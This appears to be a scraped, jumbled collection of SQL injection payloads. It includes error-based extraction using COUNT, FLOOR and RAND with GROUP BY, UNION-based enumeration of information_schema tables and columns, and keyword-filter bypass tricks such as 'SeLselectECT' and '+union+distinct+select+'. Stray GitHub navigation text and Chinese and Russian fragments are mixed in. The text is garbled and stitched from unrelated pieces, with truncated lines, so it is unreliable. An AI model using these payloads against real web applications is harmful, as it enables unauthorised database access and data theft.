...1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,unhex(Hex(cast
select a,b,null,null from table1 union select null,null,c,d from table2 union select null,null,null,null,e,f from table3.
1 AND (SELECT 1 FROM (SELECT COUNT(*),concat(0x3a,(SELECT column_name FROM information_schema.COLUMNS WHERE TABLE_NAME="table1" LIMIT 0,1),0x3a,FLOOR(rand(0)*2))a FROM information_schema.COLUMNS GROUP BY a LIMIT 0,1)b)
SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'columnname';#find table which have a column called 'columnname' and 0<(select count(xxx) from tbl_user) and 1<2 #盲注爆字段.
In this repository All GitHub ↵. Jump to ↵.
AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),FLOOR(RAND(0)*2))).
like we see [select] is down let's double text [Replacing keywords] like this SeLselectECT.
SELECT column_names FROM table_name WHERE column_name IS NOT NULL; Demo Database.
UNION SELECT ByPassing method. +union+distinct+select+.
select * from users where id='12'. а ссылка будет выглядеть вот так